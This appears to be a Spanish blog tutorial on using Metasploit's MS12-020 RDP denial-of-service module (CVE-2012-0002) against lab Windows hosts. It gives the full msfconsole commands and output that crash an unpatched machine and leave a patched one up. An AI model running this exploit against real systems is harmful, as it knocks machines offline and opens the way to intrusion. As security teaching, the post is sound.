Metasploit, MS12-020

Uno de los últimos fallos de Windows y que que provoca una denegación de servicio a los equipos que la sufren es el conocido como MS12-020, vulnerabilidad CVE-2012-0002. Dicho fallo afecta al protocolo RDP (escritorio remoto) y puede permitir la ejecución remota de código.
El fallo fue corregido por Microsfot en Marzo de este año, pero todavía hay numerosos equipos afectados. Metasploit tiene un pequeño exploit, plenamente funcional, que aprovecha dicho fallo para provocar un fallo en el equipo y hacer que éste se reinicie. Vamos a ver de forma muy sencilla cómo saber si el equipo es vulnerable.
  • Buscamos el módulo a usar y lo cargamos
    msf > search MS12-020
    
    Matching Modules
    ================
    
    Name                                 Disclosure Date Rank  Description
    ----                                 --------------- ----  -----------
    auxiliary/.../ms12_020_maxchannelids 2012-03-16     normal MS12-020...
    
    msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
    
  • Configuramos el módulo con la IP del Windows vulnerable (192.168.1.130)
    msf  auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.1.130
    RHOST => 192.168.1.130
    msf  auxiliary(ms12_020_maxchannelids) > show options
    
    Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       RHOST  192.168.1.130    yes       The target address
       RPORT  3389             yes       The target port
    
  • Ejecutamos el exploit
    msf  auxiliary(ms12_020_maxchannelids) > run
    
    [*] 192.168.1.130:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
    [*] 192.168.1.130:3389 - 210 bytes sent
    [*] 192.168.1.130:3389 - Checking RDP status...
    [+] 192.168.1.130:3389 seems down
    [*] Auxiliary module execution completed
    
    Bien! Acabamos de conseguir explotar la vulnerabilidad que presenta. Ahora mismo el equipo se está reiniciando, pero sabemos que es vulnerable, por lo que cuando vuelva se podría intentar ejecutar código remotamente en él.
  • Ejecutamos el exploit contra un equipo NO vulnerable
    Como se puede observar, este equipo está parcheado y el exploit no hace nada, como se observa en la penúltima línea.
    msf  auxiliary(ms12_020_maxchannelids) > run
    
    [*] 192.168.1.132:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
    [*] 192.168.1.132:3389 - 210 bytes sent
    [*] 192.168.1.132:3389 - Checking RDP status...
    [*] 192.168.1.132:3389 is still up
    [*] Auxiliary module execution completed
    


No hay comentarios :

Publicar un comentario

Formulario de contacto

Nombre

Correo electrónico *

Mensaje *

Últimos comentarios